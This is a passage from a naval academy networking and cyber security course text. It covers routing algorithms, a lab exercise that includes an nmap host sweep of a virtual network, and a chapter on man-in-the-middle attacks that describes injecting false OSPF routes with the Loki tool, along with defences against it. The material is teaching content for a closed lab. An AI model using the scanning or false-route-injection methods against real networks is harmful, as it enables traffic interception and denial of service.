An Aside Because of time constraints in EC310, we just say: Each router runs Dijkstra’s Algorithm. This is a well-known algorithm which solves this problem (the details of which we skip). You should know, though, that the algorithm is truly one of the all-time-beauts in network theory. The algorithm solves the problem: Find the shortest path from Node X to every other node in an arbitrary network where the edges have nonnegative weights associated with them. The algorithm is not hard, but would require a full period (perhaps) to fully explain it. Many reasonably good explanations can be found on the web. Dijkstra's Algorithm has two interesting (non-technical) facts associated with it. First, the algorithm was published in 1959. We realize that to the average midshipmen, the year 1959 might as well be 1659, but—truth be told—1959 is really not that long ago! It is fascinating to think that the basic problem of determining the shortest path in a network eluded the great minds throughout history—Euclid, Euler, Newton, Leibniz, Descartes, Fermat, Hilbert—not to be discovered until 1959. Second, the algorithm was published in a journal article that was strikingly brief. The paper presenting this earthshattering result was slightly over two pages long. Just two pages! Next time your History prof tells you that your paper needs to be 10 pages to say anything of value, reply: "WRONG! Haven't you heard of Dijkstra!" Dijkstra had a number of interesting personal idiosyncrasies. Despite the fact that he invented the field of structured computer programming and contributed a key concept (the semaphore) to the study of operating systems, he limited his own use of computers. Until the time he retired from academe in 2000 he wrote all his papers by hand, used only the chalkboard for teaching, and strictly limited his computer use to web browsing and email. He passed away in 2002 at age 72. Practice Problem 15.2 Given the following network map with the weights of edges between routers: (a) Construct the Link State Packet (LSP) that Router C would send to Router B. Solution: (b) After Router G runs Dijkstra's Algorithm, what would be the optimal route from router G to router B, and what would be the total cost of this route? Solution: 353 C. Topology changes. What if a link dies? For instance, in the picture on page 351 above, what if the link connecting Router 18 to Router 26 should die? In link state routing, whenever a router detects a change in the state of its links, it sends a new link state packet. Thus, if the link connecting Router 18 to Router 26 should die, Router 26 will transmit a new LSP with the entries: 26 Weight 2 3 Router 35 51 Note that Router 18 will also detect the loss of a connection to Router 26 and transmit a new LSP as well. These new LSP's will then propagate to all other routers via controlled flooding. You might be wondering: Won't there now be conflicting information in the other routers? For instance, there will now be two pieces of information from Router 26: The old LSP from Router 26 that had info about the link to Router 18: 26 Weight 4 2 3 Router 18 35 51 and the revised LSP without info about router 18: 26 Weight 2 3 Router 35 51 Which of these should another router in the network choose to use to build its network picture and run Dijkstra's Algorithm? To solve this perplexing predicament, yielding a righteous resolution to this difficult dilemma, and thus causing midshipmen merriment, each LSP has a sequence number. That is, a Router stamps its first LSP with sequence number 1, its second LSP with sequence number 2, and so forth. Higher sequence numbers override lower sequence numbers. So, when other routers in the network receive a new LSP from Router 26, they will notice that it has a higher sequence number than the previous LSP, and they will delete the previous (outdated) LSP. Okay…each router has to send LSPs when the router first is connected to the network, and also has to send LSPs whenever the network topology changes. Are there any other times that routers send LSPs? The answer is Yes! All routers also send LSPs periodically, just to make sure all routers are “on the same page.” Where is link state routing used in the Internet? The Internet’s Open Shortest Path First (OSPF) protocol uses linkstate routing. (Open refers to the fact that the standard is “open,” i.e., published, non-propriety.) 2. Distance Vector Routing The other routing methodology is Distance Vector Routing (also variously called Bellman - Ford Routing or Ford - Fulkerson Routing) A. Basic Idea. Each router maintains a table: Destination router My guess of best distance Which outgoing line Each router learns its immediate (1-hop) neighbors and the distance to them. Each router shares its knowledge about the entire network with its neighbors. This table is called a vector of distances, or, a distance vector. These tables are exchanged with neighbors only. When a router receives a distance vector from a neighbor, it uses that information to update its own distance vector. Routers send distance vectors periodically, whether or not changes have occurred. To consider how the distance vector algorithm works, let's consider the network shown below. A B 2 C 4 D 3 354 Initially, each of the four routers exchanges a Hello Packet with its neighbors, learning who their neighbors are, and the distance to their neighbors. For example, Router B receives a Hello Packet from Router A and Router C, learning that these two routers are a distance of 2 and 4 away, respectively. After this initial exchange, each of the four routers builds an initial routing table: A B 2 B 2 C D 4 A 2 C 4 3 B 4 D 3 C 3 Now, every router shares its table with its neighbors. Consider this exchange from Router A's perspective. Router A receives from Router B the distance vector shown above. Hey, Router A, I have an entry in my table for Router C. Router C is a distance of 4 away from me. A B 2 C D 4 3 Hey, Router A, you're a genius. But, Router B, you are a distance of 2 away from me, so… Router C must be a distance of 6 away from me!!! So, Router A changes its routing table to: A B 2 C D 4 3 B 2 C 6 Now, consider the matter from Router B's perspective. Router C tells Router B: "Router D is a distance of 3 away from me." Router B then reasons: "Router C is a distance of 4 away from me, and Router D is a distance of 3 away from Router C, so Router D must be a distance of 7 away from me." So, Router B changes its routing table to: A B 2 B 2 C 6 C D 4 3 A 2 C 4 D 7 In a like manner, Router C and Router D change their routing tables based on the initial exchange. Thus, after the initial exchange of packets is complete, the distance vectors are: A B 2 B 2 C 6 C D 4 3 A 2 C 4 D 7 A 6 B 4 D 3 355 B 7 C 3 But… matters are not done yet! Now that routers have reconstituted their distance vectors, they exchange them again! Note that distance vectors are exchanged with neighbors only. So, Router B tells Router A: "Router D is 7 away from me." Router A then reasons: "Router D must be 9 away from me." After all Routers reevaluate their distance vectors, we have this: A B 2 B 2 C 6 D 9 C D 4 3 A 2 C 4 D 7 A 6 B 4 D 3 A 9 B 7 C 3 Hopefully this example convinces you that even though distance vectors are only exchanged with immediate neighbors, information about the full network will eventually percolate to all routers. But you are likely wondering: Okay… all the routers have distance vectors, but how do they use them for routing? To fill in this last piece of the distance-vector puzzle, let's show a more complex example (taken from the Tanenbaum text). B. Distance Vector Routing Consider the network shown on the left below. Further, suppose that for this scenario the weights used in the network represent time delays. Obviously, we would like data to be routed with minimal delay. You are Router J. Notice that you have four neighbors: A, I, H and K. Your delay to A is 8, your delay to I is 10, your delay to H is 12 and your delay to K is 6. You receive the distance vectors shown below on the right (the first column is the received distance vector from Router A, the second is from Router I, the third from Router H and the last column is the received distance vector from Router K. Your goal: Write down your new estimates of distances to all nodes, and annotate your distance vector showing the next router on the best path to each destination. From, Tanenbaum, Computer Networks, 3rd ed To see how you would accomplish this, let's focus on how you (Router J) would determine the best way to route a packet to Router F. Your neighbor Router A is 8 away from you. Router A says to you: "I can get to F in 23" Thus, if you use Router A as your next hop to Router F, you will get to Router F with a delay of 31. Your neighbor Router I is 10 away from you. Router I says to you: "I can get to F in 20" Thus, if you use Router I as your next hop to Router F, you will get to Router F with a delay of 30. Your neighbor Router H is 12 away from you. Router H says to you: "I can get to F in 19" Thus, if you use Router H as your next hop to Router F, you will get to Router F with a delay of 31. Your neighbor Router K is 6 away from you. Router K says to you: "I can get to F in 40" Thus, if you use Router K as your next hop to Router F, you will get to Router F with a delay of 46. 356 Comparing these four values, you (Router J) conclude that the best way to route a packet to Router F is to send it to Router I. The total delay from Router J to Router F will be 30. Practice Problem 15.3 You are Router J. Notice that you have four neighbors: A, I, H and K. Your delay to A is 8, your delay to I is 10, your delay to H is 12 and your delay to K is 6. 25You receive the distance vectors shown below on the right (the first column is the received distance vector from Router A, the second is from Router I, the third from Router H and the last column is the received distance vector from Router K. Write down your new estimates of distances to all nodes, and annotate your distance vector showing the next router on the best path to each destination. From, Tanenbaum, Computer Networks, 3rd ed Solution: 25 Note that it is not necessary that the delay between two nodes be the same in each direction. So, for example, it is perfectly valid for the delay from J to A to be 8, while the delay from A to J be a different value (e.g., 9). 357 Figure 22.17 Two-node instability Figure 22.17 Two-node instability The “Count to Infinity” Problem in Distance Vector Routing Consider the three-node network shown below. C. Atop Node A and Node B, we show the entry in their routing table for Node X. Node X is a distance of 2 away from Node A. Node X is a distance of 6 away from Node B. All is well. Figure 22.17 Two-node instability Then Node X dies. Node A does not receive a Hello packet and realizes Node X must have died. It adjusts its routing table to show that Node X is unreachable (a distance of infinity away). Then, something weird happens, and it has nothing to do with the fact that the At Hoc alert announcing the active shooter drill ended at 1046 did not actually get promulgated until 1245. Rather, this happens: Router A receives a distance vector from Router B saying "I can reach Router X in a distance of 6." Then…what do you do as Router A? You know that Router B is a distance of 4 away from you… and he's saying that he can Two-node reach X in a distance of 6… You update your routing table! Figure 22.17 instability Figure 22.17 Two-node instability 22.34 Then you share your distance vector with B, and she updates her routing entry for X: 22.34 This exchange continues back and forth, until the cows come home, or until the cows come home blue in the face, or until the cows come home blue in the face on a cold day in hell. 22.34 Forouzan, Data Communications and Networking, McGraw Hill, 2007 How can we limit or mitigate this instability? One proposed solution is to set some finite number = ∞. If we set, for example, 30 = ∞, then after seven distance vector exchanges in the example above, both Router A and Router B would have concluded that Router X was unreachable. Most distance vector routing uses a hop-count metric, which means that the weight on each edge is equal to one. To avoid the count-to-infinity problem, many algorithms set 16 = ∞. 3. Routing Protocol Summary 22.34 22.34 Link State Routing: o Each router does its own calculations (Dijkstra) independent of other routers. o Convergence is better because calculations are local o Better scalability But... o Uses flooding. Distance Vector Routing: o o But... o o Is easy to implement In a static environment, the algorithm will correctly compute shortest paths to all destinations. In a dynamic environment route computations might not stabilize and/or might be incorrect The algorithm does not scale well 358 Practice Problem 15.4 In the event that router G experienced a fatal power supply failure, which protocol would be best suited to recovering from this failure and sharing correct routing information? (a) Link State Routing (b) Distance Vector Routing (c) Both protocols are robust and would be unaffected by this anomaly. Solution: 359 360 Problems 1. Concerning routing algorithms: (a) Compare how well link-state algorithms and distance vector algorithms respond in the event of a router failure. (b) Suppose a network uses distance vector routing. What would happen if a router sent a distance vector with all zeroes? (c) Describe the “count-to-infinity” problem. (Use a picture is you find it helpful.) (d) In distance vector routing, each router receives distance vectors from (choose one): (i) Every router in the network (ii) Its one-hop neighbors (iii) DHCP (iv) The table set up by the network administrator (v) Messages exchanged using ARP 2. Consider the network shown below which uses distance vector routing. You are router C. You have just received the following distance vectors: From B: A B C D E F From D: 4 0 8 13 7 2 A B C D E F From E: 17 11 6 0 8 10 A B C D E F 8 6 2 10 0 4 Your distances to B, D and E are 7, 4 and 6, respectively. What is your new routing table (include the distance and next hop for each destination)? B C A D E 3. F Consider the network whose graph is shown below. Assume link-state routing is used. 361 (a) (b) (c) (d) 4. 5. 6. Which routers does Router C send LSPs to? Sketch the LSP sent by Router C. Show the correct routing table for Router C Show the correct routing table for Router E Determine the correct routing table for Router A in the figure below. Fill in the blanks for the below statements that describe the two major categories of routing protocols. (a). In _____________________ routing, a router will tell its immediate neighbors what it knows about the entire network. (b). In _____________________ routing, a router will tell the entire network what it knows about its immediate neighbor (controlled flooding). Complete the partial routing table for Router C for the destinations listed below. 362 Destination Next element Total cost --- 0 A B C D E 363 364 Security Exercise 15 Introduction Let’s put to use the networking skills we have learned to date to better understand routing at the router. 1. Set-Up Equipment required: Your issued Laptop. o Turn off the wireless adapter. o Connect the blue Ethernet cable at your desk to your issued laptop. A printed or electronic copy of this security exercise. o If printed, separate the network diagram and answer sheet and have them ready to fill in. VMware Workstation o Power on your Cyber2 VM, then click VM and Settings. o Select Network Adapter and ensure that Connected, Connected at power on, and Bridged: Connected directly to the physical network, and Replicate physical network connection state are selected or checked, then click OK. o Open a terminal in your Cyber2 VM and execute the command sudo dhclient Once it finishes, execute the command ifconfig Your screen should look similar to Figure 1 on page 366. Interface eth1 should be assigned an IP address of 192.168.XX.1YY, where XX is your classroom number and YY is a number between 0 and 254. If not, notify your instructor or lab technician. 365 Figure 1 – ifconfig executed after initial lab setup. Part 1: Getting the Lay of the Land 2. Where Am I? Locate EC310 MID on your network diagram. This is your Cyber2 VM which has just joined a virtual network in a virtual world. You have an Ethernet card in your virtual machine called eth1 that has been assigned an IP address on the virtual network. Identify a) your IP address and compute b) your network address and network mask in CIDR notation using the information from ifconfig. Label parts a) and b) of your network diagram. In order for your packets to leave this virtual network and venture out into the virtual world, your virtual machine must send them to a Gateway Router. Router A is serving this purpose for the network you are connected to. To send your packets to Router A and out into the world, you must know its IP address first. Execute the command route –n Identify the IP address of the Gateway Router. Look under the Gateway column of the Kernel’s IP routing table (see Figure 1 for reference). Recall that address 0.0.0.0 is used to represent any IP address and is not the Gateway Router’s address. Label part c) of your network diagram. 3. Where Do I Go Next? In this virtual world there is an important website located at http://www.usna.edu. Verify the website www.usna.edu exists by opening Firefox and navigating to the website address. Access Firefox by selecting Applications, Internet, Firefox from the system toolbar at the top of your virtual machine (see the figure at the top of the next page for reference). 366 Browse the website to see what information is available. Question 1: Who maintains the website at www.usna.edu? In order for your virtual machine to access this website it first must know the webserver’s IP address. Recall from SI110 that the Domain Name System (DNS) provides a convenient way for us to remember a website’s name rather than a bunch of numbers for an IP address. Both are interchangeable through a series of ‘phonebooks’ (DNS name servers) on the Internet that perform lookups on our behalf. If you provide the phonebook (DNS name server) the name of the webserver you would like to access, it will give you its IP address in response or vice versa as shown in the example in Figure 2 below. Figure 2 – DNS query and response. The query above was generated using a utility called dig to find the IP address for www.cynicalmids.tumblr.com. dig allows you to query a DNS name server and resolve its IP address. Identify the IP address of the website www.usna.edu by executing the following command dig www.usna.edu Label part d) of your network diagram with the IP address belonging to the eth0 interface of the webserver www.usna.edu. 4. How Do I Get There? There are two methods to discover information about the path between you and the webserver www.usna.edu. The first method is the utility ping with record route. It will tell you the IP addresses of the OUTGOING interfaces along the way to and from the final destination. 367 Figure 3 – Example use of ping with record route option. For example, in Figure 3, after the command ping –R –c1 –n 2.2.2.15 is executed, the OUTGOING interfaces are listed in order beginning with: 1) 3.3.3.5 2) 2.2.2.1 3) 2.2.2.15 – the host computer’s interface. – Router A’s eth1. – the webserver’s interface. The OUTGOING interfaces of the return trip are listed in order beginning with: 4) 2.2.2.15 5) 3.3.3.1 6) 3.3.3.5 – the webserver’s interface. – Router A’s eth0. – the host computer’s interface. Identify the IP addresses of the interfaces traversed between you and the webserver www.usna.edu using the ping command (do not forget the –R and –c1 and –n options). Label parts e) through g) of your network diagram. The second method is the utility traceroute, which works similar to ping, except it tells you the address of the INCOMING interface along the path between you and your destination. For example, in Figure 4 on page 369, after the command traceroute –n 2.2.2.15 is executed, the INCOMING interfaces are listed in order beginning with: 1) 3.3.3.1 2) 2.2.2.15 – Router A’s INCOMING interface. – the webserver’s interface. Execute a traceroute to the webserver www.usna.edu (do not forget the –n option). Question 2: Compare your traceroute results with your network diagram. Did they match the expected results obtained from the ping command? 368 Figure 4 – Example of traceroute command. 5. Is Anyone Else Out There? Routers B and C are also present in this virtual world and are responsible forwarding packets between the networks they are connected to and learning about other networks from other routers. Recall from Lecture #15 that routers learn about each other’s networks by using a routing protocol such as the Open Shortest Path First (OSPF) protocol. In OSPF, routers use Link State Packets (LSPs) to communicate with each other and learn about the network topology. Let’s take a closer look at this communication. Launch Wireshark (as root) by selecting Applications, Internet, Wireshark (as root) from the system toolbar at the top of your virtual machine. Open the packet capture labeled sx15 in the ec310code folder in your home directory. Examine the captured OSPF hello packets in the packet details pane. Be sure to expand the OSPF Header and the OSPF Hello Packet portions (see the figure at the top of the next page for reference). These packets were captured from one of the routers in your virtual world. 369 Recall from Lesson 15 that in OSPF routers send Hello Packets at a specific interval in order to let other routers know they are alive. This interval is called the Hello Interval. Question 3: Using the information in the captured Hello Packets, what is the Hello Interval for the router they were captured from? Verify the Hello Interval by observing the amount of time between two OSPF hello packets in your packet capture. Is it equal to the Hello Interval? If after a certain amount of time a router does not receive a Hello Packet from another router it deems that router to be ‘dead’ and removes all routes that were advertised by that router. The time duration before a router is declared dead is known as the Dead Interval. This allows OSPF to respond well to dynamic changes in the network topology. Question 4: What is the Dead Interval for the router’s captured Hello Packets? If you could stop a router’s hello packets from being advertised, would you disable that router? Hello Packets also serve the important function of beginning a neighbor association between two routers when they first meet. Before the new routers agree to swap routing information they must agree on a basic set of parameters and become neighbors first. A router begins this process by identifying itself in the OSPF Header of the packet under the Source OSPF Router field. Question 5: Look inside the OSPF Header of the captured Hello Packet. What IP address is listed in the Source OSPF Router field (note: this IP address does not begin with 192.168.65.XX)? This is IP address is very important. It is known as the Router’s ID and uniquely identifies this router to all other routers. Who is responsible for assigning IP addresses anyway? The network administrator is responsible for assigning IP addresses among many other tasks in maintaining the network. They assign blocks of IP addresses as part of the design of the network architecture to best meet the needs of their clients. What are the routers talking about with each other and why do they need to communicate so often? There are a number of internal measures routers use in order increase efficiency and prevent unnecessary information from clogging up the network, such as electing a Designated Router (DR) and Backup Designated Router (BDR) and managing Link State Updates (LSU). To learn more about OSPF, see http://www.ietf.org/rfc/rfc2328.txt. 6. Could Anyone Hurt Me? Lastly, an evil instructor (because aren’t all instructors evil?) is also present in this virtual world. He or she is located on the 5.5.5.0/25 network and your final task is to find him or her. nmap is powerful utility which allows us to scan networks and identify which hosts are active among many other useful tasks. Execute the command below to scan the 5.5.5.0/25 network and determine which hosts are ‘up’ (i.e., active). It may take a few minutes. nmap –sP 5.5.5.0/25 Use traceroute or ping to identify the path to each of the hosts identified as ‘up’ by nmap. Question 6: Using your network diagram and the results from traceroute or ping, what is the most likely IP address of the evil instructor? Confirm the IP address identified with your instructor or lab technician. Label part h) of your network diagram. Use traceroute or ping to verify the interfaces between you and the evil instructor. Label parts i) through k) on your network diagram. 370 7. Clean Up VMware Workstation o In the VMware Workstation menu click VM and Settings. o Select Network Adapter and ensure that Connected, and Connected at power on, are unchecked, and ensure that Host-only: A private network shared with the host is selected or checked, then click OK. o Suspend your Cyber2 VM. Disconnect the blue Ethernet cable. Turn on your wireless adapter. 371 372 Security Exercise 15 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: 373 RA, eth3, c) ___.___.___.___ 4.4.5.0/24 SX#16 Only Evil Instructor ___.___.___.___ /___ m) www.usna.edu ___.___.___.___ RC, eth4, f) web, eth0, d) RC 4.4.4.0/24 4.4.4.1 ___.___.___.___ RB ___.___.___.___ ___.___.___.___ 2.2.2.0/29 RA, eth4, RA, eth5, e) i) RB, eth3, ___.___.___.___ 1.1.1.0/29 RB, eth2, RA ___.___.___.___ RC, eth5, EC310 Security Exercise 15 & 16 RC, eth3, g) ___.___.___.___ j) k) ___.___.___.___ ___.___.___.___ /__ b) MID, eth1, a) EC310 MID ___.___.___.___ 5.5.5.0/25 EVL, eth0, h) 374 Chapter 16: The Man-In-The-Middle Attack Objectives: (a) Describe the Man-In-The-Middle (MITM) attack and list what advantages it provides the attacker. (b) Construct a routing table based on a network diagram and manipulate a routing table to exploit a specific target. (c) Describe the steps that should be taken to prevent false route injection and identify who is responsible for performing these preventative actions and how they can be applied. I. Trust 1. A Quick Review Where are we at in our understanding of how networks interconnect? We’ve talked about routing algorithms and how these weird things called routing tables are constructed; we’ve talked about the layers and protocols involved in networking; we’ve also talked about addressing schemes and specifically how MAC addresses and IP addresses are used; but, what is the point of all this? Much like the host section in the first six weeks of EC310, we need to understand how networks work before we can manipulate their operation and violate the principles of security. Much like a locksmith, once we understand how a lock operates, we know that a key is not the only thing that can open a door. If we are thinking like a locksmith about networks from a security perspective, what is the underlying assumption between routers in the routing algorithms they use to construct their routing tables? The assumption is that each router can trust the information that other routers are sending it. That is, Router A assumes by default that Router B is telling the truth about the state of its links or the distance between it and other routers. But what happens when that is not the case? Would a machine ever lie to another machine? Are there evil machines out there that want to do bad, mean, horrible things to people? Gasp, what if it was true! Have you ever seen Terminator 2: Judgment Day!? Sadly, most of your classmates were not born when this movie released, but I highly recommend it for your Netflix queue. You will not be able to call yourself a hacker until you watch it. 375 Practice Problem 16.1 Consider the network below. How would the routing tables evolve using distance vector routing? Router A Next Destination Hop B B C C D - Cost 4 5 ∞ Router B Next Destination Hop A A C D D Router C Next Destination Hop A A B D D Cost 4 ∞ 2 Cost 5 ∞ 2 Router D Next Destination Hop A B B C C Cost ∞ 2 2 Everyone shares its table with its neighbors. Solution: But what if Router C was evil and began to falsify information about its link to Router A; how would the routing table change? Router A Next Destination Hop B B C C D - Cost 4 5 ∞ Router B Next Destination Hop A A C D D Router C Next Destination Hop A A B D D Cost 4 ∞ 2 Everyone shares its table with its neighbors. Solution: What does this mean for all of Router D’s traffic destined for Router A? More importantly, why would Router D’s traffic go through Router C instead? 376 Cost 1 ∞ 2 Router D Next Destination Hop A B B C C Cost ∞ 2 2 Fortunately, machines cannot lie to one another, but the humans that operate the machines do lie (or make mistakes) and can force the machines to do the same. In the previous example, we saw how a simple lie about the distance between two routers could change the direction of traffic flow within the network, but why is this of concern? Even with this manipulation, if Router D wanted to send packets to Router A, won’t the information be delivered just as before? (note that only Router D is fooled by Router C’s lie. Router A’s table is not affected by Router C’s lie and it will still route to Router D via Router B with a total cost of 6. This is because Router A knows its distance to Router C.) Hi, remember me? I’m Ciana. No. Now that Router C is in the middle of Router D and Router A, it can: 1. Observe the traffic moving between these devices. 2. Change the information moving between these devices. 3. Stop the traffic from moving between these devices. Why is this an issue? Recall from SI110, there are five pillars of information assurance we want to preserve when offering services through routers and other information systems. 26 1. Confidentiality – protection of information from disclosure to unauthorized individuals, systems, or entities. 2. Integrity – protection of information, systems, and services from unauthorized modification or destruction. 3. Availability – timely, reliable access to data and information services by authorized users. 4. Non-repudiation – the ability to correlate, with high certainty, a recorded action with its originating individual or entity. 5. Authentication – the ability to verify the identity of an individual or entity. Grr…Don’t remember me, huh? You’d better for the test! Practice Problem 16.2 What primary pillar of information assurance is violated in each thing Router C can do once it is in the middle of Router D and Router A? (a) The ability to observe traffic violates: (b) The ability to change traffic violates: (c) The ability to stop traffic violates: 2. The Man-In-The-Middle (MITM) Attack This type of problem is called the Man-In-The-Middle attack. We have seen this once already in Chapter 14. Specifically, the technique used to conduct the MITM attack in Chapter 14 was called ARP-Spoofing because to redirect another computer’s traffic on a single network required your computer to tell a specific lie about the association between its MAC address and IP address Much like a nasty rumor in the Brigade, that lie had to spread around for it to be effective. Similarly, you included your own MAC address with the target’s IP address through multiple unsolicited ARP-Replies to convince everyone on your local network that your machine was the target host. Finally, everyone on your local network had to believe your lie for you to begin receiving packets destined for the target machine. Do you think it is possible for something like this to happen on a bigger scale? That is, instead of a Man-In-The-Middle attack on one network as with ARP-spoofing, can this happen between multiple networks? 26 See http://www.usna.edu/CS/si110/lec/l00/lec.html to review these topics and definitions. 377 Yes it could happen, and things similar to this have already happened, but to understand how requires a bit more understanding of the how networks interconnect. However, just as before with ARP-Spoofing, there are four critical steps that must occur for an attacker to make this possible. 1. Take control of a machine on the network and manipulate its operation. 2. Force the machine to tell the “right” kind of lie. 3. Force the machine to spread the lie around. 4. Force other machines to believe the lie. 3. Wait a Minute… “Boring! Okay, so I may not remember much from SI110, but the one thing I do remember is that encryption solves all of our problems. If someone is snooping around and reading my packets, then I will just encrypt them and ruin their ability to influence my communication. Done, may I go now?” As Mr. Eric Snowden recently revealed, that is exactly what the National Security Agency (NSA) and others would want you to think. 27 While it is true that encryption may make eavesdropping harder for the man in the middle, it is not insurmountable. In reality, as the New York Times explains, some of the core encryption protocols of the Internet are already broken. For those that are not, the NSA allegedly spends upwards of $250 million a year on US and foreign industries to covertly influence commercial product designs to make them exploitable. To leverage this advantage, the NSA pays a significant amount of money to become the man in the middle so they can read any Internet traffic, encrypted or not. One example from WIRED magazine talks about a $652 million NSA project to help take control of routers and networks to monitor foreign communications.28 Hopefully, it is clear that understanding how a MITM attack can take place across multiple networks is very important to Cyber Warfare as a whole. Yes, sir! Please give me more details so that I can understand this critically important material. II. A Closer Look at How Networks Interconnect 1. An Important Example Let’s say there is an important website that all midshipmen need to access to in order to prepare for EC310 each day. That website is located at IP address 4.4.5.155 on the network 4.4.5.0/24. The 27 28 See http://www.nytimes.com/2013/09/06/us/nsa-foils-much-internet-encryption.html?pagewanted=1&_r=2& See http://www.wired.com/threatlevel/2013/09/nsa-router-hacking/) 378 midshipmen who need access to it are located on network 192.168.65.0/24, and have one of the 253 available host IP addresses assigned to their laptops. 379 Practice Problem 16.3 Construct the routing table for Router A. Now, let’s pretend there is an evil instructor (because aren’t all instructors evil?) located on the 5.5.5.0/25 network that wants to prevent students from reaching the EC310 website at 4.4.5.155. What would that instructor need to do in order to make the student’s traffic go to some place they did not intend? 380 a) First, the instructor will need to: take control of a machine on the network and manipulate its operation. Being an instructor, ITSD has graciously allowed him (or her) privileged access to his office computer for ‘academic research’, but nowhere else. ITSD has restricted the instructor’s privileged access in order to prevent him from making any changes that could affect other computers on the network. Therefore, the instructor will need to manipulate his computer in such a way where it can alter the flow of traffic across the networks and deny midshipmen access to the course website. To accomplish this, he decides to turn his computer into a router using a special software tool called Loki.29 This tool ‘speaks’ the Open Shortest Path First (OSPF) protocol, which will enable the injection of false routing information into the networks. b) Second, the instructor will need to: force his router to tell the “right” kind of lie. 29 Loki is a Python based framework implementing many packet generation and attack modules for Layer 3 protocols. It was developed by ERNW, an IT security service provider, in 2010. See https://www.ernw.de/research/loki.html for more details. 381 But what is the “right” kind of lie to tell? Well, that depends on the effect the instructor wants to have on the networks. For example, if the instructor wanted to cause a panic across the entire Brigade, he or she might say that “buffalo chicken sandwiches will no longer be offered in King Hall.” However, if he only wanted to terrorize the students in his EC310 section, the instructor could say “you will have a quiz tomorrow over Lessons 1 through 15 worth 99.2003% of your final grade.” The instructor’s goal is to stop the students’ traffic from reaching the EC310 web server located at 4.4.5.155. To do this the instructor would like to direct the students’ traffic to a different location where their web requests will go unanswered. Knowing that routers transmit information to the destination that matches the longest network prefix in their routing table, the instructor decides to create a false network from his router with a more specific network ID that will direct the student’s traffic away. Practice Problem 16.4 What is the first and last IP address of the 4.4.5.0/24 network where the webserver is located? (a) First Address: (b) Last Address: Looking at Router A’s table, what network ID and mask should the evil instructor choose? Other options? What is the first and last address of the false network the evil instructor will advertise? (a) First Address: (b) Last Address: Does the IP address of the webserver fall within the IP address block that the evil instructor will advertise? c) Third, the instructor will need to: force his router to spread the lie around. Recall from Lesson 15, under the Internet’s Open Shortest Path First (OSPF) protocol, routers communicate with one another using Link State Packets (LSP). These packets are distributed to all routers through “controlled flooding” to allow each router to build a full and complete picture of the topology of the entire network. However, before routers swap LSP with each other, they must become neighbors first and agree on a basic set of operating parameters. Therefore, in order for the evil instructor to spread his lie about the fake network he must become neighbors first with a router on his network. Then he can send his malicious LSP advertising the false network he is connected to. d) Fourth, the instructor will need to: force the other routers to believe the lie. 382 Fortunately for the attacker in OSPF this is relatively easy because controlled flooding is already built into the protocol. As previously mentioned, LSP are forwarded to all routers through controlled flooding to ensure all routers have a complete picture of the network’s topology. Thus, once Router B learns about the new false network from the evil instructor, Router B will turn around and tell Routers A and C. Practice Problem 16.5 What will Router A’s routing table look like, once it hears the lie about the fake network from Router B? Thus, whenever a student sends a packet destined for the webserver at 4.4.5.155, where will Router A forward their packet? Will the EC310 students ever be able to reach the course web page? Do you think it is possible that something like this could ever happen on the Internet? Unlike the previous example, the Internet consists of hundreds of thousands of networks stretched across the entire globe. Could it be possible for someone to change the way traffic flows across such a big and complex distributed system? 383 Yes it could happen, and similar things like this have already happened, but to understand how requires a bit more understanding of the Internet first. Specifically, we need to understand the fundamental protocol of the Internet, the Border Gateway Protocol (BGP). That is, before we can become a locksmith (of the Internet), we need to know a bit more about how the lock (the Internet) operates. 2. Protection Against False Route Injection How can we stop such malicious behavior? Recall that by default routers trust the information other routers are sending, but this does not have to be the case. The Open Shortest Path First protocol has two authentication mechanism built in to protect against false route injection. The first is a simple plaintext-password added to all LSPs so each router can authenticate the information it is receiving. If a router sends a LSP without the appropriate password, then the LSP is rejected. The second method is an MD5-hash of the OSPF packet and a shared secret key. Recall from SI110, that hashing is a ‘one-way’ encryption technique that produces the same message digest (i.e., encrypted output) given the same input string. Additionally, while it is easy to hash the input string, it is very hard to identify the input string given only the message digest (remember the Rubik’s cube?). In OSPF, routers can send the hash of the OSPF packet and a shared secret key along with their LSP to authenticate themselves with other routers. Of course, all routers must know the shared secret key in advance. This may seem trivial at first, but consider the number of routers at a place like Google or Amazon Web Services where there are literally thousands of routers. Lastly, separate from these two authentication mechanisms, most implementations of OSPF allow for creation of passive interfaces. Just like when your roommate starts getting on your nerves and you tune him or her out by putting your headphones on, routers can do the same thing. Once a network administrator sets up a passive interface on a router, the router will ignore all routing information being sent over that interface. However, this requires network administrators to make smart decisions when setting up the topology of their networks and configuring their routers. Practice Problem 16.6 Briefly describe two technical solutions to protect against false route injection and identify who is responsible for implementing them. Solution #1: Solution #2: OPTIONAL: Interestingly, of the three actions an attacker can take during a MITM attack, what do you think an attacker would most likely want to do? Observe, change, or stop your traffic? It seems frightening to have our traffic stopped by someone else or changed as it is moving to its destination, but recent cyber activity has indicated it is more likely an attacker would want to observe your traffic in the end. Consider the following excerpt from Kevin Mandiant’s report on Advanced Persistent Threat 1 (APT1), a Chinese cyber warfare unit: Our evidence indicates that APT1 has been stealing hundreds of terabytes of data from at least 141 organizations across a diverse set of industries beginning as early as 2006. Remarkably, we have witnessed APT1 target dozens of organizations simultaneously. Once the group establishes access to a victim’s network, they continue to access it periodically over several months or years to steal large volumes of valuable intellectual property, including technology blueprints, proprietary manufacturing processes, test results, business plans, pricing documents, partnership agreements, emails and contact lists from victim organizations’ leadership. We believe that the extensive activity we have directly observed represents only a small fraction of the cyber espionage that APT1 has committed. Once APT1 has compromised a network, they repeatedly monitor and steal proprietary data and communications from the victim for months or even years. For [141] organizations... we found that APT1 maintained access to the victim’s network for an average of 356 days. The longest time period APT1 maintained access to a victim’s network was at least 1,764 days, or four years and ten months. APT1 was not continuously active on a daily basis during this time period; however, in the vast majority of cases we observed, APT1 continued to commit data theft as long as they had access to the network. 30 Notice the chosen behavior of this Chinese cyber warfare unit. Rather than shut down the networks of the various companies they invaded or change the information located there, they simply observed the traffic and stole copies for themselves. It would seem their primary desire was not to do damage but to gain information. 30 See http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf for the full report on APT1 originally published in 2013. 384 Problems 1. What is the underlying assumption between routers in the routing algorithms they use which makes it possible to conduct a Man-In-The-Middle (MITM) attack? 2. What three things can an attacker do to your network traffic in a Man-In-The-Middle (MITM) attack and what pillar of Information Assurance is affected during each? 3. Sketch the routing table for Router C for the network shown on page 420. 4. An attacker is located on the 5.6.7.0/24 network and wants to prevent midshipmen from reaching a website at 8.8.8.26. He turns his computer into a router using Loki to advertise a false network to Router C. (a) Construct the routing table for Router C. Use the template shown below: (b) Looking at Router C’s 